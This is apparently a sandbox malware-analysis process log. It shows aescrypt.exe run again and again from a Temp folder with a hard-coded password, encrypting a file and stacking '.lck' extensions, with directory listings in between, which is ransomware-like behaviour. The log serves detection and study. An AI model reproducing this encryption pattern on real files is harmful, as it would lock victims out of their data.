C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5216

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5444

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5524

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5580

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5780

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5812

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:3800

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6000

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6076

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6132

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:3748

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:1212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5276

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5296

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5472

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5588

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6056

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4636

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4100

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
